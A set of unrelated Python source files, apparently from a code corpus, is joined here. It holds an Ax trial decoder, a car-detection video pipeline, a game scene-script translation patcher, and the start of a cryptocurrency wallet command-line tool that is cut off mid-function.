f"Cannot decode SQARunner because {runner_sqa.runner_type} "
f"is an invalid type."
)
args = runner_class.deserialize_init_args(
args=dict(runner_sqa.properties or {})
)
# pyre-ignore[45]: Cannot instantiate abstract class `Runner`.
runner = runner_class(**args)
runner.db_id = runner_sqa.id
return runner
    def trial_from_sqa(
        self, trial_sqa: SQATrial, experiment: Experiment, reduced_state: bool = False
    ) -> BaseTrial:
        """Convert SQLAlchemy Trial to Ax Trial.

        Args:
            trial_sqa: `SQATrial` to decode.
            experiment: The (already-decoded) experiment the trial belongs to.
            reduced_state: Whether to load trial's generator run(s) with a slightly
                reduced state (without model state, search space, and optimization config).
        """
        if trial_sqa.is_batch:
            trial = BatchTrial(
                experiment=experiment,
                optimize_for_power=trial_sqa.optimize_for_power,
                ttl_seconds=trial_sqa.ttl_seconds,
                index=trial_sqa.index,
            )
            generator_run_structs = [
                GeneratorRunStruct(
                    generator_run=self.generator_run_from_sqa(
                        generator_run_sqa=generator_run_sqa,
                        reduced_state=reduced_state,
                    ),
                    weight=generator_run_sqa.weight or 1.0,
                )
                for generator_run_sqa in trial_sqa.generator_runs
            ]
            # If a status quo was stored, it lives in a dedicated
            # STATUS_QUO generator run; pull it out into the trial's
            # status-quo fields and drop that run from the struct list.
            if trial_sqa.status_quo_name is not None:
                new_generator_run_structs = []
                for struct in generator_run_structs:
                    if (
                        struct.generator_run.generator_run_type
                        == GeneratorRunType.STATUS_QUO.name
                    ):
                        status_quo_weight = struct.generator_run.weights[0]
                        trial._status_quo = struct.generator_run.arms[0]
                        trial._status_quo_weight_override = status_quo_weight
                        trial._status_quo_generator_run_db_id = (
                            struct.generator_run.db_id
                        )
                        trial._status_quo_arm_db_id = struct.generator_run.arms[0].db_id
                    else:
                        new_generator_run_structs.append(struct)
                generator_run_structs = new_generator_run_structs
            trial._generator_run_structs = generator_run_structs
            # Abandoned-arm metadata is skipped entirely in reduced state.
            if not reduced_state:
                trial._abandoned_arms_metadata = {
                    abandoned_arm_sqa.name: self.abandoned_arm_from_sqa(
                        abandoned_arm_sqa=abandoned_arm_sqa
                    )
                    for abandoned_arm_sqa in trial_sqa.abandoned_arms
                }
            trial._refresh_arms_by_name()  # Trigger cache build
        else:
            trial = Trial(
                experiment=experiment,
                ttl_seconds=trial_sqa.ttl_seconds,
                index=trial_sqa.index,
            )
            # A non-batch trial may carry at most one generator run.
            if trial_sqa.generator_runs:
                if len(trial_sqa.generator_runs) != 1:
                    raise SQADecodeError(  # pragma: no cover
                        "Cannot decode SQATrial to Trial because trial is not batched "
                        "but has more than one generator run."
                    )
                trial._generator_run = self.generator_run_from_sqa(
                    generator_run_sqa=trial_sqa.generator_runs[0],
                    reduced_state=reduced_state,
                )
        trial._trial_type = trial_sqa.trial_type
        # Swap `DISPATCHED` for `RUNNING`, since `DISPATCHED` is deprecated and nearly
        # equivalent to `RUNNING`.
        trial._status = (
            trial_sqa.status
            if trial_sqa.status != TrialStatus.DISPATCHED
            else TrialStatus.RUNNING
        )
        # Restore timestamps and metadata not settable via constructors.
        trial._time_created = trial_sqa.time_created
        trial._time_completed = trial_sqa.time_completed
        trial._time_staged = trial_sqa.time_staged
        trial._time_run_started = trial_sqa.time_run_started
        trial._abandoned_reason = trial_sqa.abandoned_reason
        # pyre-fixme[9]: _run_metadata has type `Dict[str, Any]`; used as
        # `Optional[Dict[str, Any]]`.
        # pyre-fixme[8]: Attribute has type `Dict[str, typing.Any]`; used as
        # `Optional[typing.Dict[Variable[_KT], Variable[_VT]]]`.
        trial._run_metadata = (
            # pyre-fixme[6]: Expected `Mapping[Variable[_KT], Variable[_VT]]` for
            # 1st param but got `Optional[Dict[str, typing.Any]]`.
            dict(trial_sqa.run_metadata)
            if trial_sqa.run_metadata is not None
            else None
        )
        trial._num_arms_created = trial_sqa.num_arms_created
        trial._runner = (
            self.runner_from_sqa(trial_sqa.runner) if trial_sqa.runner else None
        )
        trial._generation_step_index = trial_sqa.generation_step_index
        trial._properties = dict(trial_sqa.properties or {})
        trial.db_id = trial_sqa.id
        return trial
def data_from_sqa(
self,
data_sqa: SQAData,
data_constructor: Optional[Type[AbstractDataFrameData]] = None,
) -> AbstractDataFrameData:
"""Convert SQLAlchemy Data to AE Data."""
# TODO: extract data type from SQAData after DataRegistry added.
data_constructor = data_constructor or Data
# pyre-ignore[45]: Cannot instantiate abstract class. But this is concrete.
dat = data_constructor(
description=data_sqa.description,
# NOTE: Need dtype=False, otherwise infers arm_names like
# "4_1" should be int 41.
df=pd.read_json(data_sqa.data_json, dtype=False),
)
dat.db_id = data_sqa.id
return dat
|
<gh_stars>0
# MAIN PROGRAM
# AUTHOR: <NAME>
import matplotlib.pyplot as plt
import glob
import time
import collections
from sklearn.svm import LinearSVC
from sklearn.preprocessing import StandardScaler
from scipy.ndimage.measurements import label
from sklearn.cross_validation import train_test_split
from moviepy.editor import VideoFileClip
from function import *
# --- Training data and feature-extraction configuration ---------------------
# Paths assume the vehicle / non-vehicle PNG datasets are unpacked next to
# this script. The settings below are shared by training (extract_features)
# and inference (search_windows / detect_cars) and must stay in sync.
cars = glob.glob('vehicles/vehicles/*/*.png')
notcars = glob.glob('temp-non-vehicles/non-vehicles/*/*.png')
color_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb
orient = 9 # HOG orientations
pix_per_cell = 8 # HOG pixels per cell
cell_per_block = 2 # HOG cells per block
hog_channel = "ALL" # Can be 0, 1, 2, or "ALL"
spatial_size = (32, 32) # Spatial binning dimensions
hist_bins = 32 # Number of histogram bins
spatial_feat = True # Spatial features on or off
hist_feat = True # Histogram features on or off
hog_feat = True # HOG features on or off
# Restrict the sliding-window search to the road area of a 1280x720 frame.
y_start_stop = [400, 720] # Min and max in y to search in slide_window()
x_start_stop = [400, 1280]
# Extract one feature vector per training image (spatial + histogram + HOG,
# per the configuration above) for both classes.
car_features = extract_features(cars, color_space=color_space,
                        spatial_size=spatial_size, hist_bins=hist_bins,
                        orient=orient, pix_per_cell=pix_per_cell,
                        cell_per_block=cell_per_block,
                        hog_channel=hog_channel, spatial_feat=spatial_feat,
                        hist_feat=hist_feat, hog_feat=hog_feat)
noncar_features = extract_features(notcars, color_space=color_space,
                        spatial_size=spatial_size, hist_bins=hist_bins,
                        orient=orient, pix_per_cell=pix_per_cell,
                        cell_per_block=cell_per_block,
                        hog_channel=hog_channel, spatial_feat=spatial_feat,
                        hist_feat=hist_feat, hog_feat=hog_feat)
# create an array stack of feature vectors
X = np.vstack((car_features, noncar_features)).astype(np.float64)
# Define the labels vector: 1 = car, 0 = non-car, in the same row order as X.
Y = np.hstack((np.ones(len(car_features)), np.zeros(len(noncar_features))))
# split up data into randomized training and test sets
# NOTE(review): `train_test_split` is imported from `sklearn.cross_validation`
# at the top of the file; that module was removed in scikit-learn 0.20 — the
# import should come from `sklearn.model_selection` instead.
rand_state = np.random.randint(0, 100)
X_train, X_test, Y_train, Y_test = train_test_split(
    X, Y, test_size=0.2, random_state=rand_state)
# Fit a per-column scaler (on the training set only, to avoid leakage).
X_scaler = StandardScaler().fit(X_train)
# Apply the scaler to X
X_train = X_scaler.transform(X_train)
X_test = X_scaler.transform(X_test)
print('Using:',orient,'orientations',pix_per_cell,
    'pixels per cell and', cell_per_block,'cells per block')
print('Feature vector length:', len(X_train[0]))
# Use a linear SVC
svc = LinearSVC()
# check SVC training time
t=time.time()
svc.fit(X_train, Y_train)
t2 = time.time()
print(round(t2-t, 2), 'Seconds to train SVC...')
# Check the score of the SVC
print('Test Accuracy of SVC = ', round(svc.score(X_test, Y_test), 4))
# Check the prediction time for a single sample
t=time.time()
image = mpimg.imread('test_images/test4.jpg')
draw_image = np.copy(image)
# Keep pristine copies: `img` feeds detect_cars, `heat_img` is what the
# final labeled boxes are drawn on.
img = image
heat_img = image
# Uncomment the following line if you extracted training
# data from .png images (scaled 0 to 1 by mpimg) and the
# image you are searching is a .jpg (scaled 0 to 255)
image = image.astype(np.float32)/255
# First approach: classify fixed-size sliding windows one by one.
windows = slide_window(image, x_start_stop=x_start_stop, y_start_stop=y_start_stop,
                    xy_window=(96, 96), xy_overlap=(0.5, 0.5))
hot_windows = search_windows(image, windows, svc, X_scaler, color_space=color_space,
                        spatial_size=spatial_size, hist_bins=hist_bins,
                        orient=orient, pix_per_cell=pix_per_cell,
                        cell_per_block=cell_per_block,
                        hog_channel=hog_channel, spatial_feat=spatial_feat,
                        hist_feat=hist_feat, hog_feat=hog_feat)
window_img = draw_boxes(draw_image, hot_windows, color=(0, 0, 255), thick=6)
plt.imshow(window_img)
# Second approach: HOG-subsampling search over one scaled band of the image.
ystart = 400
ystop = 656
scale = 1.5
out_img, bboxes = detect_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block,
                    spatial_size, hist_bins)
print("show 1")
plt.show()
#plt.imshow(out_img)
image = out_img
box_list = bboxes
# NOTE(review): `np.float` is deprecated (removed in NumPy 1.24);
# this should be `float` or `np.float64`.
heat = np.zeros_like(image[:,:,0]).astype(np.float)
# Add heat to each box in box list
heat = add_heat(heat, box_list)
# Apply threshold to help remove false positives
heat = apply_threshold(heat, 1)
# Visualize the heatmap when displaying
heatmap = np.clip(heat, 0, 255)
# Find final boxes from heatmap using label function
labels = label(heatmap)
draw_img = draw_labeled_bboxes(np.copy(heat_img), labels)
# Show the detections next to the heatmap they were derived from.
fig = plt.figure()
plt.subplot(121)
plt.imshow(draw_img)
plt.title('Car Positions')
plt.subplot(122)
plt.imshow(heatmap, cmap='hot')
plt.title('Heat Map')
plt.show()
fig.tight_layout()
# Rolling window of per-frame heatmaps; summing the last 30 frames smooths
# detections over time and suppresses one-frame false positives.
heatmaps = collections.deque(maxlen=30)
def pipeline(image):
    """Annotate one RGB video frame with boxes around detected cars.

    Uses the globals defined above (svc, X_scaler, ystart/ystop, scale and
    the feature-extraction settings) plus the `heatmaps` deque for temporal
    smoothing. Returns a copy of the frame with labeled boxes drawn on it.
    """
    # np.float is deprecated/removed in modern NumPy; use the builtin.
    heat = np.zeros_like(image[:, :, 0]).astype(float)
    out_img, bboxes = detect_cars(image, ystart, ystop, scale, svc, X_scaler,
                                  orient, pix_per_cell, cell_per_block,
                                  spatial_size, hist_bins)
    heat = add_heat(heat, bboxes)
    # Appending mutates the module-level deque; no `global` needed (the
    # original declared `global heats`, a name that does not exist).
    heatmaps.append(heat)
    heatmap_sum = sum(heatmaps)
    # Apply threshold to help remove false positives, then clip for labeling.
    thresholded = apply_threshold(heatmap_sum, 1)
    heatmap = np.clip(thresholded, 0, 255)
    # BUG FIX: label the *thresholded* heatmap. The original called
    # `label(heatmap_sum)`, silently discarding the threshold it had just
    # applied — inconsistent with the single-image code above, which labels
    # the thresholded map.
    labels = label(heatmap)
    return draw_labeled_bboxes(np.copy(image), labels)
# Run the detection pipeline over every frame of the project video and
# write the annotated result to disk.
video = VideoFileClip("project_video.mp4")
clip = video.fl_image(pipeline) #NOTE: this function expects color images!!
output = "output.mp4"
clip.write_videofile(output, audio=False)
|
import os
import pickle, shutil
from ssmanager import SSManager
from gameexe import Gameexe
# Input trees:
#   oPath - original scene scripts ("o" entries)
#   cPath - existing Chinese translation of those scripts ("c" entries)
#   nPath - new/updated scene scripts to be re-translated ("n" entries)
oPath = r"E:\hackbase\ss_rwn\scene_orig"
cPath = r"E:\hackbase\ss_rwn\scene_chs"
nPath = r"E:\hackbase\ss\scene"
# Outputs: pickled "untranslated leftovers" reports and patched .ss files.
poPath = r"D:\Desktop\scene_call"
outPath = r"D:\Desktop\scene_out"
gexePath = r"E:\hackbase\ss\Gameexe.ini"
gexe = Gameexe()
# Gameexe.ini is UTF-16; decode before handing the line list to the parser.
gexe.load(open(gexePath, "rb").read().decode("utf-16").split("\n"))
# basename -> {"o"/"c"/"n": {"path": ..., "size": ...}}
sceneDict = {}
# Context radii: neighbouring strings kept for review reports (output) vs.
# compared when disambiguating conflicting translations (match).
outputContextRadius = 6
matchContextRadius = 4
# Reset the report/output directories so each run starts from scratch.
# ignore_errors covers the first run (directories absent) and also fixes
# the original bare try/except, where a failure removing poPath silently
# skipped the removal of outPath as well.
shutil.rmtree(poPath, ignore_errors=True)
shutil.rmtree(outPath, ignore_errors=True)
os.makedirs(poPath)
os.makedirs(outPath)
def matchContext(l, i, dummyIndex, processor, radius):
    """Return True when the (above, below) context recorded in *processor*
    equals the actual context around index *i* of string list *l*."""
    expected_above, expected_below = processor[0], processor[1]
    actual_above, actual_below = getContext(l, i, dummyIndex, radius)
    return (actual_above, actual_below) == (expected_above, expected_below)
def getContext(l, i, dummyIndex, radius):
    """Return (lines-above, lines-below) surrounding index *i* of *l*.

    The windows are clipped to the valid range [0, dummyIndex) so context
    never spills past the "dummy" marker.

    BUG FIX: the original ignored the *radius* parameter and always used
    the module-level matchContextRadius, so callers passing
    outputContextRadius silently got the narrower match window.
    """
    above = l[max(0, i - radius):i]
    below = l[i + 1:min(i + radius + 1, dummyIndex)]
    return above, below
def allAscii(s):
    """Return True when every character of *s* is 7-bit ASCII."""
    return s.isascii()
def bytecmp(a, b):
    """Return True when files *a* and *b* DIFFER byte-for-byte.

    Despite the name this is a "differs" predicate, matching how callers
    use it (``isDiff = bytecmp(...)``).

    BUG FIX: the original leaked both file handles; context managers close
    them deterministically.
    """
    with open(a, "rb") as fa, open(b, "rb") as fb:
        return fa.read() != fb.read()
def _index_scene_files(root, key):
    """Record path/size of every .ss file under *root* into sceneDict.

    Entries merge across the three source trees, so a basename accumulates
    "o"/"c"/"n" sub-entries of the form {"path": ..., "size": ...}.

    This replaces three copy-pasted os.walk loops; it also drops the
    unused fInfo dict and only stats files that pass the extension check.
    """
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            basename, ext = os.path.splitext(fn)
            if ext != ".ss":
                continue
            path = os.path.join(dirpath, fn)
            entry = sceneDict.setdefault(basename, {})
            entry[key] = {"path": path, "size": os.stat(path).st_size}

# Original, translated, and new/updated script trees.
_index_scene_files(oPath, "o")
_index_scene_files(cPath, "c")
_index_scene_files(nPath, "n")
# Classify every scene by comparing the original tree against the new tree.
diff = {}   # in both trees but contents differ -> needs re-translation
same = {}   # in both trees and byte-identical
rm = {}     # only in the original tree (removed in the new version)
new = {}    # only in the new tree (added in the new version)
for basename, entry in sceneDict.items():
    oHas = "o" in entry
    nHas = "n" in entry
    if oHas and not nHas:
        # BUG FIX: this previously assigned into an undefined name
        # `remove`, raising NameError as soon as a removed scene was seen.
        rm[basename] = entry
        continue
    if nHas and not oHas:
        new[basename] = entry
        continue
    # Equal sizes do not imply equal content; fall back to a byte compare.
    isDiff = entry["o"]["size"] != entry["n"]["size"]
    if not isDiff:
        isDiff = bytecmp(entry["o"]["path"], entry["n"]["path"])
    if isDiff:
        diff[basename] = entry
    else:
        same[basename] = entry
# --- string match ---------------------------------------------------------
# For every changed scene, rebuild its translation by looking up each line
# of the new script in the old (original -> Chinese) pair, using the
# surrounding lines as context to disambiguate conflicting translations.
untranslatedDict = {}
for iEntry, (basename, entry) in enumerate(diff.items()):
    print(iEntry ,"/", len(diff))
    # Load the three variants of this scene. Everything before the "dummy"
    # marker in the string list is dialogue text; everything after it is
    # expected to be ASCII-only script internals.
    orig = SSManager()
    chs = SSManager()
    plus = SSManager()
    orig.load(open(entry["o"]["path"], "rb").read())
    chs.load(open(entry["c"]["path"], "rb").read())
    plus.load(open(entry["n"]["path"], "rb").read())
    origDummyIndex = orig.stringList.index("dummy")
    chsDummyIndex = chs.stringList.index("dummy")
    plusDummyIndex = plus.stringList.index("dummy")
    # Original and translated scripts must line up one-to-one.
    assert(origDummyIndex == chsDummyIndex)
    # NOTE(review): list.index raises ValueError instead of returning -1,
    # so the next two asserts can never fire.
    assert(origDummyIndex != -1)
    assert(plusDummyIndex != -1)
    if(origDummyIndex < len(orig.stringList) - 1):
        assert(all(allAscii(x) for x in orig.stringList[origDummyIndex:]))
        assert(all(allAscii(x) for x in chs.stringList[chsDummyIndex:]))
        assert(all(allAscii(x) for x in plus.stringList[plusDummyIndex:]))
    # Collect conflicts: source lines that map to more than one distinct
    # translation (same original line translated differently by context).
    sentenceDict = {}
    conflictDict = {}
    tempDict = {}
    # First pass: gather every translation seen for each source line
    # (skipping empty lines and character names from Gameexe).
    for i, origSentence in enumerate(orig.stringList[:origDummyIndex]):
        if(not origSentence or origSentence in gexe.namae):
            continue
        translatedStr = chs.stringList[i]
        inDict = tempDict.get(origSentence, None)
        if(inDict is None):
            inDict = []
            tempDict[origSentence] = inDict
        inDict.append(translatedStr)
    # Reduce to the number of DISTINCT translations per source line.
    tempDict = {k: len(set(v)) for k, v in tempDict.items()}
    # Second pass: for ambiguous lines, record (context-above, context-below,
    # translation) triples so the right translation can be chosen later.
    for i, origSentence in enumerate(orig.stringList[:origDummyIndex]):
        if(not origSentence or origSentence in gexe.namae):
            continue
        translatedStr = chs.stringList[i]
        if(tempDict[origSentence] > 1):
            ctx = (*getContext(orig.stringList, i, origDummyIndex, matchContextRadius), translatedStr)
            processList = conflictDict.get(origSentence, None)
            if(processList is None):
                processList = []
                conflictDict[origSentence] = processList
            processList.append(ctx)
    del tempDict
    # Build sentenceDict: unambiguous source line -> its single translation.
    for i, origSentence in enumerate(orig.stringList[:origDummyIndex]):
        if(not origSentence or origSentence in gexe.namae):
            continue
        if(not origSentence in conflictDict):
            sentenceDict[origSentence] = chs.stringList[i]
    # Translate the new script in place, line by line.
    nMiss = 0
    nHit = 0
    # Pristine copy kept for context matching, since plus.stringList is
    # mutated as lines get translated.
    untranslatedPlusStringList = list(plus.stringList)
    for i, plusSentence in enumerate(plus.stringList[:plusDummyIndex]):
        if(not plusSentence or plusSentence in gexe.namae):
            continue
        conflictProcessorList = conflictDict.get(plusSentence, None)
        hit = False
        if(conflictProcessorList is not None):
            # Ambiguous line: apply the translation whose recorded context
            # matches this occurrence.
            # NOTE(review): no break after a match, so a later processor
            # with matching context overwrites an earlier one — confirm
            # this is intended.
            for processor in conflictProcessorList:
                if(matchContext(untranslatedPlusStringList, i, plusDummyIndex, processor, matchContextRadius)):
                    plus.stringList[i] = processor[2]
                    hit = True
        else:
            translatedStr = sentenceDict.get(plusSentence, None)
            if(translatedStr is not None):
                plus.stringList[i] = translatedStr
                hit = True
        if(not hit):
            nMiss += 1
            # Record the untranslated line with wide context for manual review.
            ctxUntranslated = getContext(untranslatedPlusStringList, i, plusDummyIndex, outputContextRadius)
            ctxTranslated = getContext(plus.stringList, i, plusDummyIndex, outputContextRadius)
            l = untranslatedDict.get(plusSentence, None)
            if(l is None):
                l = []
                untranslatedDict[plusSentence] = l
            l.append((ctxUntranslated, ctxTranslated))
        else:
            nHit += 1
    if(nMiss):
        # NOTE(review): untranslatedDict is never cleared between scenes,
        # so each pickle also contains the misses of all earlier scenes —
        # confirm whether that accumulation is intended.
        pickle.dump(untranslatedDict, open(os.path.join(poPath, "%s.pickle" % (basename,)), "wb"))
        print("Missed %d / %d" % (nMiss, nMiss + nHit))
    open(os.path.join(outPath, "%s.ss" % (basename,)), "wb").write(plus.dump())
# Final summary of the scene classification.
summary = (
    ("Total:", len(sceneDict)),
    ("Same:", len(same)),
    ("Removed:", len(rm)),
    ("New:", len(new)),
)
for caption, count in summary:
    print(caption, count)
print(" %s" % (str(list(new.keys()))))
|
#!/usr/bin/env python3
import os
from binascii import hexlify, a2b_base64
from collections import namedtuple
from decimal import Decimal
from typing import List
import click
import grpc
import simplejson as json
from google.protobuf.json_format import MessageToJson
from pypurlib.pypurlib import mnemonic2bin, hstr2bin, bin2hstr
from pur.core import config
from pur.core.Wallet import Wallet, WalletDecryptionError
from pur.core.misc.helper import parse_hexblob, parse_qaddress
from pur.core.MultiSigAddressState import MultiSigAddressState
from pur.core.txs.MessageTransaction import MessageTransaction
from pur.core.txs.SlaveTransaction import SlaveTransaction
from pur.core.txs.TokenTransaction import TokenTransaction
from pur.core.txs.Transaction import Transaction
from pur.core.txs.TransferTokenTransaction import TransferTokenTransaction
from pur.core.txs.TransferTransaction import TransferTransaction
from pur.core.txs.multisig.MultiSigCreate import MultiSigCreate
from pur.core.txs.multisig.MultiSigSpend import MultiSigSpend
from pur.crypto.purss import purSS, hash_functions
from pur.generated import pur_pb2_grpc, pur_pb2
# Name of the environment variable that can override --wallet_dir.
ENV_pur_WALLET_DIR = 'ENV_pur_WALLET_DIR'
# NOTE(review): OutputMessage declares error/address_items/balance_items,
# yet the listing code accesses .qaddress/.hashFunction on the items it is
# annotated with — the annotation looks stale; verify against Wallet.
OutputMessage = namedtuple('OutputMessage', 'error address_items balance_items')
BalanceItem = namedtuple('BalanceItem', 'address balance')
# Timeout (seconds) applied to every gRPC call to the node.
CONNECTION_TIMEOUT = 5
class CLIContext(object):
    """Holds the CLI-wide options and derives wallet/node connection settings."""

    def __init__(self, verbose, host, port_public, wallet_dir, output_json):
        self.verbose = verbose
        self.host = host
        self.port_public = port_public
        # Normalize the wallet directory and derive the wallet file path.
        self.wallet_dir = os.path.abspath(wallet_dir)
        self.wallet_path = os.path.join(self.wallet_dir, 'wallet.json')
        self.output_json = output_json

    def get_stub_public_api(self):
        """Open an insecure gRPC channel to the node's public API and return a stub."""
        endpoint = '{}:{}'.format(self.host, self.port_public)
        return pur_pb2_grpc.PublicAPIStub(grpc.insecure_channel(endpoint))
def _print_error(ctx, error_descr, wallets=None):
# FIpurE: Dead function
if ctx.obj.output_json:
if wallets is None:
wallets = []
msg = {'error': error_descr, 'wallets': wallets}
click.echo(json.dumps(msg))
else:
print("ERROR: {}".format(error_descr))
def _serialize_output(ctx, addresses: List[OutputMessage], source_description) -> dict:
    """Build the JSON-serializable wallet listing for *addresses*.

    Each entry carries number/address/balance/hash_function; a balance
    that cannot be fetched is rendered as '?' and the error recorded.
    """
    if not addresses:
        return {'error': 'No wallet found at {}'.format(source_description), 'wallets': []}
    msg = {'error': None, 'wallets': []}
    for pos, item in enumerate(addresses):
        try:
            shor = _public_get_address_balance(ctx, item.qaddress)
            balance = '{:5.8f}'.format(Decimal(shor) / config.dev.shor_per_quanta)
        except Exception as e:
            # Node unreachable (or similar): report the error but keep listing.
            msg['error'] = str(e)
            balance = '?'
        msg['wallets'].append({
            'number': pos,
            'address': item.qaddress,
            'balance': balance,
            'hash_function': item.hashFunction,
        })
    return msg
def validate_ots_index(ots_key_index, src_purss, prompt=True):
    """Return a valid OTS index, prompting the user once before giving up.

    Exits the process when the index is still out of range after one prompt.
    """
    upper = src_purss.number_signatures - 1
    while not (0 <= ots_key_index <= upper):
        if not prompt:
            click.echo("OTS key index must be between {} and {} (inclusive)".format(0, upper))
            quit(1)
        ots_key_index = click.prompt('OTS key Index [{}..{}]'.format(0, upper), type=int)
        prompt = False
    return ots_key_index
def get_item_from_wallet(wallet, wallet_idx):
    """Return wallet.address_items[wallet_idx], or None (with a warning) when out of range."""
    if 0 <= wallet_idx < len(wallet.address_items):
        return wallet.address_items[wallet_idx]
    # BUG FIX: click.echo has no foreground-color argument — its `color`
    # parameter is a bool that toggles ANSI handling, so color='yellow'
    # printed plain text. click.secho(fg=...) is the colored call.
    click.secho('Wallet index not found {}'.format(wallet_idx), fg='yellow')
    return None
def _print_addresses(ctx, addresses: List[OutputMessage], source_description):
    """Render the wallet listing either as JSON or as an aligned text table."""
    # Row formatters for the plain-text table (verbose adds the hash column).
    def _normal(wallet):
        return "{:<8}{:<83}{:<13}".format(wallet['number'], wallet['address'], wallet['balance'])
    def _verbose(wallet):
        return "{:<8}{:<83}{:<13}{}".format(
            wallet['number'], wallet['address'], wallet['balance'], wallet['hash_function']
        )
    output = _serialize_output(ctx, addresses, source_description)
    if ctx.obj.output_json:
        output["location"] = source_description
        click.echo(json.dumps(output))
    else:
        # An error with an empty wallet list means the wallet file itself
        # was missing; just print the error.
        if output['error'] and output['wallets'] == []:
            click.echo(output['error'])
        else:
            click.echo("Wallet at          : {}".format(source_description))
            if ctx.obj.verbose:
                header = "{:<8}{:<83}{:<13}{:<8}".format('Number', 'Address', 'Balance', 'Hash')
                divider = ('-' * 112)
            else:
                header = "{:<8}{:<83}{:<13}".format('Number', 'Address', 'Balance')
                divider = ('-' * 101)
            click.echo(header)
            click.echo(divider)
            for wallet in output['wallets']:
                if ctx.obj.verbose:
                    click.echo(_verbose(wallet))
                else:
                    click.echo(_normal(wallet))
def _public_get_address_balance(ctx, address):
    """Query the node for the balance (in shor) of *address* via the public API."""
    request = pur_pb2.GetAddressStateReq(address=parse_qaddress(address))
    response = ctx.obj.get_stub_public_api().GetOptimizedAddressState(request, timeout=CONNECTION_TIMEOUT)
    return response.state.balance
def _select_wallet(ctx, address_or_index):
    """Resolve *address_or_index* to an (address_bytes, purss_signer) pair.

    Accepts either a numeric index into the local wallet or a Q-address.
    A Q-address not present in the local wallet is parsed and returned with
    a None signer. Exits the process on failure.
    """
    try:
        wallet = Wallet(wallet_path=ctx.obj.wallet_path)
        if not wallet.addresses:
            click.echo('This command requires a local wallet')
            return
        if wallet.encrypted:
            secret = click.prompt('The wallet is encrypted. Enter password', hide_input=True)
            wallet.decrypt(secret)
        if address_or_index.isdigit():
            address_or_index = int(address_or_index)
            addr_item = get_item_from_wallet(wallet, address_or_index)
            if addr_item:
                # FIpurE: This should only return pk and index
                purss = wallet.get_purss_by_index(address_or_index)
                return wallet.addresses[address_or_index], purss
        elif address_or_index.startswith('Q'):
            # Look the address up in the local wallet so we can sign with it.
            for i, addr_item in enumerate(wallet.address_items):
                if address_or_index == addr_item.qaddress:
                    purss = wallet.get_purss_by_address(wallet.addresses[i])
                    return wallet.addresses[i], purss
            click.echo('Source address not found in your wallet', color='yellow')
            quit(1)
        # Not in the wallet: parse and return the raw address with no signer.
        return parse_qaddress(address_or_index), None
    except Exception as e:
        # NOTE(review): broad catch — this also swallows programming errors;
        # the process exits either way.
        click.echo("Error selecting wallet")
        click.echo(str(e))
        quit(1)
def _quanta_to_shor(x: Decimal, base=Decimal(config.dev.shor_per_quanta)) -> int:
    """Convert quanta to shor, rounding with Decimal's default (banker's) mode."""
    scaled = Decimal(x * base)
    return int(scaled.to_integral_value())
def _parse_dsts_amounts(addresses: str, amounts: str, token_decimals: int = 0, check_multi_sig_address=False):
    """Parse space-separated address and amount lists into parallel lists.

    'Qaddr1 Qaddr2 ...' -> [addr_bytes1, addr_bytes2, ...]
    '10 10'             -> [10e9, 10e9]  (converted to shor)

    :param addresses: space-separated Q-addresses
    :param amounts: space-separated decimal amounts (quanta, or token units)
    :param token_decimals: when non-zero, scale amounts by 10**token_decimals
        instead of the quanta->shor factor
    :param check_multi_sig_address: also accept multi-sig addresses
    :raises Exception: when the two lists differ in length
    """
    # str.split() with no argument tolerates repeated/leading/trailing
    # blanks; the original split(' ') turned a double space into an empty
    # token that crashed parse_qaddress / Decimal.
    addresses_split = [parse_qaddress(addr, check_multi_sig_address) for addr in addresses.split()]
    if token_decimals != 0:
        multiplier = Decimal(10 ** int(token_decimals))
        shor_amounts = [_quanta_to_shor(Decimal(amount), base=multiplier) for amount in amounts.split()]
    else:
        shor_amounts = [_quanta_to_shor(Decimal(amount)) for amount in amounts.split()]
    if len(addresses_split) != len(shor_amounts):
        raise Exception("dsts and amounts should be the same length")
    return addresses_split, shor_amounts
########################
########################
########################
########################
# Root command group: every wallet_*/tx_* command below hangs off this.
@click.version_option(version=config.dev.version, prog_name='pur Command Line Interface')
@click.group()
@click.option('--verbose', '-v', default=False, is_flag=True, help='verbose output whenever possible')
@click.option('--host', default='127.0.0.1', help='remote host address [127.0.0.1]')
@click.option('--port_pub', default=19009, help='remote port number (public api) [19009]')
@click.option('--wallet_dir', default='.', help='local wallet dir', envvar=ENV_pur_WALLET_DIR)
@click.option('--json', default=False, is_flag=True, help='output in json')
@click.pass_context
def pur(ctx, verbose, host, port_pub, wallet_dir, json):
    """
    pur Command Line Interface
    """
    # Stash the global options on the click context so subcommands can
    # reach them via ctx.obj.
    ctx.obj = CLIContext(verbose=verbose,
                         host=host,
                         port_public=port_pub,
                         wallet_dir=wallet_dir,
                         output_json=json)
@pur.command()
@click.pass_context
def wallet_ls(ctx):
    """
    Lists available wallets
    """
    # Read-only: load the local wallet file and print the address table.
    wallet = Wallet(wallet_path=ctx.obj.wallet_path)
    _print_addresses(ctx, wallet.address_items, ctx.obj.wallet_dir)
@pur.command()
@click.pass_context
@click.option('--height', default=config.dev.purss_tree_height,
              help='purSS tree height. The resulting tree will be good for 2^height signatures')
@click.option('--hash_function', type=click.Choice(list(hash_functions.keys())), default='shake128',
              help='Hash function used to build the purSS tree [default=shake128]')
@click.option('--encrypt', default=False, is_flag=True, help='Encrypts important fields with AES')
def wallet_gen(ctx, height, hash_function, encrypt):
    """
    Generates a new wallet with one address
    """
    wallet = Wallet(wallet_path=ctx.obj.wallet_path)
    # Refuse to clobber an existing wallet file.
    if len(wallet.address_items) > 0:
        click.echo("Wallet already exists")
        return
    wallet.add_new_address(height, hash_function)
    _print_addresses(ctx, wallet.address_items, ctx.obj.wallet_path)
    # Optionally encrypt before the first save so secrets never reach disk
    # in the clear.
    if encrypt:
        secret = click.prompt('Enter password to encrypt wallet with', hide_input=True, confirmation_prompt=True)
        wallet.encrypt(secret)
    wallet.save()
@pur.command()
@click.option('--height', type=int, default=config.dev.purss_tree_height, prompt=False)
@click.option('--hash_function', type=click.Choice(list(hash_functions.keys())), default='shake128',
              help='Hash function used to build the purSS tree [default=shake128]')
@click.pass_context
def wallet_add(ctx, height, hash_function):
    """
    Adds an address or generates a new wallet (working directory)
    """
    secret = None
    wallet = Wallet(wallet_path=ctx.obj.wallet_path)
    # Remember the original encryption state so the wallet is re-encrypted
    # with the same passphrase after the new address is added.
    wallet_was_encrypted = wallet.encrypted
    if wallet.encrypted:
